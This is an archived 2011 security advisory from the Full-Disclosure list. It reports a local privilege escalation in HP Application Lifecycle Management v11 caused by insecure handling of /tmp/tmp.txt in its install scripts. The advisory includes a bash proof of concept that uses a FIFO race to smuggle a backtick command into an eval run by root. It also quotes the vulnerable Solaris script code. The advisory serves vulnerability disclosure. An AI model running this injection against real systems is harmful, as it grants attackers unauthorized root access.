lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CALX_EUTd-4E6qrhq4v0d0iiyiVDbucO9SaX-69DYeePV+8mZEQ@mail.gmail.com>
Date: Thu, 8 Dec 2011 11:14:59 +0000
From: 0a29 40 <0a2940@...il.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: 0A29-11-2 : Privilege escalation vulnerability in
 HP Application Lifestyle Management (ALM) Platform v11

================
Privilege escalation vulnerability in HP Application Lifestyle Management
(ALM) Platform v11

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
================
Description:
================

The HP Application Lifestyle Management configuration tool contains a
vulnerable function 'GetInstalledPackages' which is called when upgrading
or uninstalling HP ALM. The AIX, HP-UX and Solaris versions use
/tmp/tmp.txt in a similar, insecure manner.

================
Timeline:
================

30 November 2011 - Reported to HP. Ignored.
08 December 2011 - Public disclosure

================
Exploit:
================

#!/bin/bash
# Simple PoC : Run as user, when vulnerable function is called
# /home/user/binary_to_run_as_root is run as root.
cat > file << EOF
Child Components
0a29406d9794e4f9b30b3c5d6702c708
\`/home/user/binary_to_run_as_root\`
EOF
mkfifo /tmp/tmp.txt			# set trap
cat /tmp/tmp.txt			# blocks for victim
while [ -e /tmp/tmp.txt ]; do
       cat file > /tmp/tmp.txt
       sleep 2
done
rm file
--
================
Details:
================

e.g. from GetInstalledPackages in SunOS_lib.sh (Solaris):
---
prodreg info -u $PRODUCT_NAME > /tmp/tmp.txt
<snip>
firstRow=`awk '/Child Components/ { print NR;}' /tmp/tmp.txt`
<snip>
firstRow=`expr $firstRow + 3`
lastRow=`awk 'END { print NR }' /tmp/tmp.txt`
<snip>
eval \child$numOfPackages=`awk '{ if ( NR == pattern ) { print $1 } }'
pattern=$firstRow /tmp/tmp.txt`
<snip>
rm /tmp/tmp.txt
---

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ